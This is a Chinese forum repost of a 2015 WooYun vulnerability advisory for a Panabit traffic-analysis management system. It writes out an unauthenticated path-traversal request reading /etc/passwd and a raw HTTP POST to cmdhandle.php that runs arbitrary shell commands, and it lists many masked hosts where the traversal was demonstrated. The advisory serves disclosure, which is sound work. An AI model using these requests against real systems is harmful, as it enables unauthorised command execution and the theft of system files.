Board logo

标题: Panabit某流量分析管理系统存在设计缺陷(无需登录可任意命令执行&文件下载) [打印本页]

作者: linda    时间: 2015-9-23 00:39     标题: Panabit某流量分析管理系统存在设计缺陷(无需登录可任意命令执行&文件下载)

漏洞概要
缺陷编号:        WooYun-2015-136721
漏洞标题:        Panabit某流量分析管理系统存在设计缺陷(无需登录可任意命令执行&文件下载)
相关厂商:        北京派网软件有限公司
漏洞作者:        YY-2012
提交时间:        2015-08-25 08:45
公开时间:        2015-11-28 01:39
漏洞类型:        设计缺陷/逻辑错误
危害等级:        高
漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源:        http://www.wooyun.org
Tags标签: 无

漏洞详情披露状态:
2015-08-25:        细节已通知厂商并且等待厂商处理中
2015-08-30:        厂商已经确认,细节仅向厂商公开
2015-09-02:        细节向第三方安全合作伙伴开放

简要描述:rt
漏洞hash:ad52dddf9e0098fc2f28738230f562d2版权声明:转载请注明来源 YY-2012@乌云

详细说明:全局可越权导致。



任意文件遍历:


code 区域http://地址/download.php?filename=../../../../etc/passwd



任意命令执行:


code 区域POST /Maintain/cmdhandle.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: 地址
Content-Length: 11
Pragma: no-cache

cmd=ls -all

漏洞证明:












code 区域**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**:8080/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd
**.**.**.**/download.php?filename=../../../../etc/passwd

修复方案:联系厂商

版权声明:转载请注明来源 YY-2012@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-08-30 01:39
厂商回复:CNVD确认并复现所述情况,由CNVD尝试通过软件生产厂商公开联系渠道向其通报,由其后续提供解决方案 .
最新状态:暂无


原文:http://www.wooyun.org/bugs/wooyun-2010-0136721





欢迎光临 中神通公司交流论坛 (http://www.trustcomputing.com.cn/bbs/) Powered by Discuz! 6.0.0